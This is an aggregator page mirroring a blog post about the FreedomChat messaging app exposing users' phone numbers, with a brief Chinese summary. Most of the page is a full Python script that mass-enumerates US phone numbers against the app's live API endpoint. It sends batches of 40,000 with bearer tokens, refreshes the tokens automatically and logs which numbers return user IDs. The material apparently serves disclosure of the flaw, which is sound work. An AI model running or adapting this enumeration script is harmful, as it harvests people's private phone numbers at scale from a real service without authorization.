Home 零对冲(ZeroHedge)每日HackerNews

“超级安全”的MAGA主题消息应用泄露了所有用户的电话号码。
“Super secure” messaging app leaks everyone's phone number

原始链接: https://ericdaigle.ca/posts/super-secure-maga-messaging-app-leaks-everyones-phone-number/

此Python脚本尝试枚举并验证FreedomChat服务中的电话号码。它遍历美国区号列表,并为每个区号生成7位数字组合,创建潜在的电话号码。然后,这些号码以40,000个批次发送到FreedomChat API以检查其有效性。 该脚本使用初始的`authToken`和`refreshToken`进行身份验证,并在令牌过期时自动刷新。它将进度记录到文件中(“freedom_enum_log.txt”),包括当前处理的区号、遇到的任何API错误以及超过3秒的响应时间。一个特定号码(+13322699625)始终包含在每个批次中。该脚本将继续运行,直到测试完所有区号和组合,从而有效地尝试识别FreedomChat平台上有效或可用的电话号码。

相关文章
原文
import itertools
import pandas as pd
import json
import requests
import datetime
import random

from time import sleep

area_codes = [
    201, 202, 203, 205, 206, 207, 208, 209, 210, 212, 213, 214, 215, 216, 217, 218, 219, 224, 225, 228, 229, 231, 234, 239, 240, 242, 248, 251, 252, 253, 254, 256, 260, 262, 267, 269, 270, 276, 281, 283, 301, 302, 303, 304, 305, 307, 308, 309, 310, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 323, 325, 327, 330, 331, 334, 336, 337, 339, 340, 346, 347, 351, 352, 360, 361, 386, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 412, 413, 414, 415, 417, 418, 419, 423, 424, 425, 430, 432, 434, 435, 440, 443, 458, 469, 470, 475, 478, 479, 480, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 512, 513, 514, 515, 516, 517, 518, 520, 530, 540, 541, 551, 559, 561, 562, 563, 564, 567, 570, 571, 573, 574, 575, 580, 585, 586, 601, 602, 603, 605, 606, 607, 608, 609, 610, 612, 614, 615, 616, 617, 618, 619, 620, 630, 631, 636, 641, 646, 650, 651, 657, 660, 661, 662, 667, 669, 678, 681, 682, 701, 702, 703, 704, 705, 706, 707, 708, 712, 713, 714, 715, 716, 717, 718, 719, 720, 724, 727, 731, 732, 734, 740, 747, 754, 757, 760, 762, 763, 765, 770, 772, 773, 774, 775, 781, 784, 785, 786, 787, 801, 802, 803, 804, 805, 806, 808, 810, 812, 813, 814, 815, 816, 817, 818, 828, 830, 831, 832, 843, 845, 847, 848, 850, 856, 857, 858, 859, 860, 862, 863, 864, 865, 870, 872, 873, 876, 877, 878, 901, 902, 903, 904, 905, 906, 907, 908, 909, 910, 912, 913, 914, 915, 916, 917, 918, 919, 920, 925, 928, 931, 937, 940, 941, 947, 951, 952, 954, 956, 970, 971, 972, 973, 975, 978, 979, 980, 985, 989
]

digits = ("0", "1", "2", "3", "4", "5", "6", "7","8", "9")
orig_combinations = pd.Series(["".join(x) for x in itertools.product(digits, repeat=7)])
orig_combinations = orig_combinations[~orig_combinations.str.startswith("0") & ~orig_combinations.str.startswith("1")]

with open("freedom_enum_log.txt", "w") as logfile:
	random.shuffle(area_codes)
	for ac in area_codes:
		logfile.write(f"Starting area code {ac}\n")
		combinations = ["+1" + str(ac) + ''.join(c) for c in list(orig_combinations)]

		url = "https://eagle.freedomchat.com/user/numbers"
		authToken = "initial auth token"
		refreshToken = "initial refresh token"

		for i in range(0, 8000000, 40000):
			tranche = combinations[i:i+40000]
			tranche.append("+13322699625")
			payload = { "numbers": tranche }
			headers = {
				"accept": "application/json, text/plain, */*",
				"authorization": f"Bearer {authToken}",
				"content-type": "application/json",
				"host": "eagle.freedomchat.com",
				"connection": "Keep-Alive",
				"accept-encoding": "gzip",
				"user-agent": "okhttp/4.12.0"
			}

			response = requests.post(url, json=payload, headers=headers)
			if "Unauthorized" in response.text:
				refreshResponse = requests.post("https://eagle.freedomchat.com//auth/refresh", json={"refreshToken": refreshToken})
				authToken = refreshResponse.json()["accessToken"]
				refreshToken = refreshResponse.json()["refreshToken"]
				response = requests.post(url, json=payload, headers=headers)
			if response.text.count("uid") != 1:
				logfile.write(response.text + "\n")
			if response.elapsed > datetime.timedelta(seconds=3):
				logfile.write(f"Getting slow! {response.elapsed}\n")
			logfile.flush()
		logfile.write(f"Done area code {ac}\n")
		combinations = []
联系我们 contact @ memedata.com